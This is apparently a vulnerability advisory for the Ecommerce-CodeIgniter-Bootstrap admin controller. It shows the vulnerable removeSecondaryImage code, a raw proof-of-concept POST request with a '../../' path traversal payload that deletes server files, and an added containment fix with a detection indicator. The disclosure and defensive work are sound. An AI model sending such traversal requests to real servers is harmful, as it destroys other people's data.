vendor: kirilkirkov/Ecommerce-CodeIgniter-Bootstrap (github.com)
version: before Vulnerability fixes from Lion Tree · kirilkirkov/Ecommerce-CodeIgniter-Bootstrap@d22b54e (github.com)
An arbitrary file deletion (CWE-73, external control of file name or path) vulnerability exists in application/modules/admin/controllers/ecommerce/Publish.php. In the method removeSecondaryImage, an attacker who has passed the admin authorization check can delete any file on the server by controlling $_POST['folder'] and $_POST['image'].
public function removeSecondaryImage()
{
    if ($this->input->is_ajax_request()) {
        // Both $_POST['folder'] and $_POST['image'] are concatenated into the path
        // unvalidated, so "../" sequences walk out of ./attachments/shop_images.
        $img = '.' . DIRECTORY_SEPARATOR . 'attachments' . DIRECTORY_SEPARATOR . 'shop_images' . DIRECTORY_SEPARATOR . '' . $_POST['folder'] . DIRECTORY_SEPARATOR . $_POST['image'];
        // The resulting path is passed straight to unlink() with no containment check.
        unlink($img);
    }
}
POST /Ecommerce-CodeIgniter-Bootstrap/admin/removeSecondaryImage HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 31
Origin: http://localhost
Connection: close
Referer: http://localhost/Ecommerce-CodeIgniter-Bootstrap/admin/publish
Cookie: ci_session=8qfeq95l0u1nfjpj6clgr5p976m7igkh; shopping_cart=a%3A1%3A%7Bi%3A0%3Bi%3A2%3B%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
image=README.md&folder=../../
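As an added example (not code from the project and not its fix commit), the following PHP shows a containment check that removeSecondaryImage() could call before unlink(): each input is restricted to a single path component, the result is canonicalised with realpath(), and the resolved file must still lie below the shop_images directory. The helper name resolveShopImagePath, the demo directory, and the controller sketch in the trailing comment are assumptions; the request payload from the report above (folder=../../, image=README.md) is one of the constructed test cases.

```php
<?php
// Added example, not the project's code: a path-containment check for
// removeSecondaryImage(). The helper is hypothetical; it is what the controller
// would call before unlink() instead of concatenating raw $_POST values.

declare(strict_types=1);

/**
 * Resolve a shop image for deletion. Returns the absolute path on success, or
 * null when the inputs are malformed, escape $baseDir, or name no regular file.
 */
function resolveShopImagePath(string $baseDir, string $folder, string $image): ?string
{
    // Each input must be a single path component: no separators, no "." or "..".
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $folder)) {
        return null;
    }
    if (!preg_match('/^[A-Za-z0-9_-]+\.[A-Za-z0-9]+$/', $image)) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $folder . DIRECTORY_SEPARATOR . $image);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Defence in depth: even after the allow-list, require the resolved path to
    // sit below the base directory (covers symlinked folders and similar cases).
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// --- Constructed demo: a throwaway directory standing in for ./attachments/shop_images ---
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'shop_images_' . bin2hex(random_bytes(4));
mkdir($root . DIRECTORY_SEPARATOR . 'product42', 0700, true);
file_put_contents($root . DIRECTORY_SEPARATOR . 'product42' . DIRECTORY_SEPARATOR . 'photo1.jpg', 'jpeg bytes');
file_put_contents($root . DIRECTORY_SEPARATOR . 'README.md', 'a file outside the per-product folders');

$cases = [
    ['product42', 'photo1.jpg'],   // legitimate request: resolves and may be deleted
    ['../../', 'README.md'],       // the payload from the report: rejected by the allow-list
    ['product42', '../README.md'], // traversal in the image name: rejected
];
foreach ($cases as [$folder, $image]) {
    $path = resolveShopImagePath($root, $folder, $image);
    printf("folder=%-12s image=%-14s -> %s\n", $folder, $image,
        $path === null ? 'REJECTED' : 'ok: ' . $path);
}

// Clean up the demo directory.
unlink($root . DIRECTORY_SEPARATOR . 'product42' . DIRECTORY_SEPARATOR . 'photo1.jpg');
rmdir($root . DIRECTORY_SEPARATOR . 'product42');
unlink($root . DIRECTORY_SEPARATOR . 'README.md');
rmdir($root);

// In the controller the method would become (sketch, not the project's actual fix):
//
//   public function removeSecondaryImage()
//   {
//       if (!$this->input->is_ajax_request()) { return; }
//       $path = resolveShopImagePath('.' . DIRECTORY_SEPARATOR . 'attachments' . DIRECTORY_SEPARATOR . 'shop_images',
//                                    (string) $this->input->post('folder'),
//                                    (string) $this->input->post('image'));
//       if ($path === null) { show_error('Invalid image reference', 400); return; }
//       unlink($path);
//   }
```

Run it with `php example.php`: the first case prints the resolved path under the temp directory, while the traversal cases print REJECTED. The allow-list regex does the real work (a value such as `../../` never reaches the filesystem); the realpath() comparison is kept as a second line of defence so that a later relaxation of the regex cannot silently reintroduce deletion outside shop_images. From a detection standpoint, POST bodies to removeSecondaryImage whose folder or image parameters contain `/`, `\` or `..` are a simple high-signal indicator for this issue.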